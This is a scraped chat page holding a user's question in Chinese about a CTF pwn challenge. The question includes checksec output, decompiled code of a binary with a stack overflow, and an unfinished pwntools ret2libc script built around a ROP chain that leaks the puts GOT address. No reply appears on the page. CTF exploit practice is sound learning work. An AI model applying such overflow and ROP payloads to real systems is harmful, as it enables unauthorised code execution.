hpp@swikar:~/pwn/shuzi/pwn/attachment$ checksec pw...
Creado el: 12 de abril de 2026
Respondido usando GPT-5.4 Thinking por Chat01
Pregunta
hpp@swikar:~/pwn/shuzi/pwn/attachment$ checksec pwn
[*] '/home/hpp/pwn/shuzi/pwn/attachment/pwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
int sub_4016C8()
{
char s[128]; // [rsp+0h] [rbp-A0h] BYREF
__int64 v2[3]; // [rsp+80h] [rbp-20h] BYREF
int v3; // [rsp+9Ch] [rbp-4h]
v3 = 0;
puts("length: ");
__isoc99_scanf("%zu", v2);
v3 = sub_4014A8(LODWORD(v2[0]));
memset(s, 0, sizeof(s));
puts("What do you want to say? ");
sub_40159F(s);
sub_4015CF(s);
sub_4015F0(s);
return printf("input: %s\n", s);
}
__int64 __fastcall sub_40159F(__int64 a1)
{
__int64 result; // rax
*(a1 + 136) = 0LL;
result = qword_404110 ^ 1;
qword_404110 ^= 1uLL;
return result;
}
__int64 sub_4015CF()
{
__int64 result; // rax
result = qword_404110 ^ 3;
qword_404110 ^= 3uLL;
return result;
}
unsigned __int64 __fastcall sub_4015F0(__int64 a1)
{
__int64 v1; // rax
unsigned __int64 result; // rax
__int16 s; // [rsp+16h] [rbp-Ah] BYREF
__int64 i; // [rsp+18h] [rbp-8h]
if ( qword_404110 == 2 )
v1 = 4LL;
else
v1 = 2LL;
for ( i = v1; ; (i * ((a1 + 136))++ + a1) = s )
{
result = *(a1 + 128);
if ( *(a1 + 136) >= result )
break;
result = *(a1 + 136);
if ( result > 0x80 )
break;
memset(&s, 0, sizeof(s));
read(0, &s, 2uLL);
result = s;
if ( s == 10 )
break;
result = HIBYTE(s);
if ( HIBYTE(s) == 10 )
break;
}
return result;
}
from pwn import*
#from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./pwn")
elf=ELF('./pwn')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=0x4016E5
context.log_level="debug"
def dbg():
gdb.attach(p)
pause()
p.sendlineafter('length:','1000')
dbg()
payload=b'a'*0xa8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendlineafter('want to say?',payload)
p.interactive()
我这样子写为什么不对,应该怎么写